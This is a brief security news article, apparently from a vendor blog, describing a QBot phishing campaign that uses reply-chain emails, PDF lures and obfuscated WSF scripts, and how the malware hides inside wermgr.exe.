QBot malware spreads through new phishing campaign

May 3, 2023 - TuxCare PR Team

Proxylife and the Cryptolaemus group have detected a new phishing effort that distributes QBot malware via PDFs and Windows Script Files (WSF). QBot, also known as QakBot, is a virus that steals information and has grown into a dropper that aids criminal groups in their malicious actions.

Phishing emails are reply-chain emails in which malicious actors respond to a sequence of emails with a malicious link or attachment. These phishing emails use a variety of languages, meaning that any organization anywhere in the globe might be compromised. When someone in the email chain views the linked PDF, they will get the warning “This document contains protected files, to display them, click on the ‘open’ button.” When you click the button, a ZIP file containing the WSF script is downloaded.

This campaign’s script has been thoroughly hidden and a blend of JavaScript (JS) and VBScript code. When run, it launches a PowerShell program that downloads the QBot DLL from a list of URLs. The script attempts each URL until it downloads and runs a file to the Windows Temp folder. When QBot is launched, it inserts itself inside the Windows Error Manager software, wermgr.exe, which is a genuine Windows component. This enables QBot to run in the background invisibly.

Kaspersky studied the campaign as well and found that it uses reply-chain emails to make it more difficult for potential targets to recognize as malicious. The emails are written in the style of legitimate business letters obtained by the attackers and urge the recipient to download a PDF attachment. This PDF file has many levels of obfuscation, making it difficult for security programs to identify its maliciousness.

Within the PDF file is a Windows Script File (WSF) containing a hidden PowerShell script encoded as a Base64 line. When the PowerShell script is run on the computer, it utilizes the wget tool to download a DLL file from a remote server, which is then used to disseminate the QBot malware to the victim’s PC.

QBot’s many layers of obfuscation make it difficult to detect. The WSF is obfuscated to evade detection, which will download further payloads, explains Timothy Morris, chief security adviser at Tanium. The attack ‘chaining,’ or using multiple steps, helps get past some protections since the full context of the nefarious behavior can’t be observed as a single activity.

The sources for this piece include an article in Malwarebytes.

Summary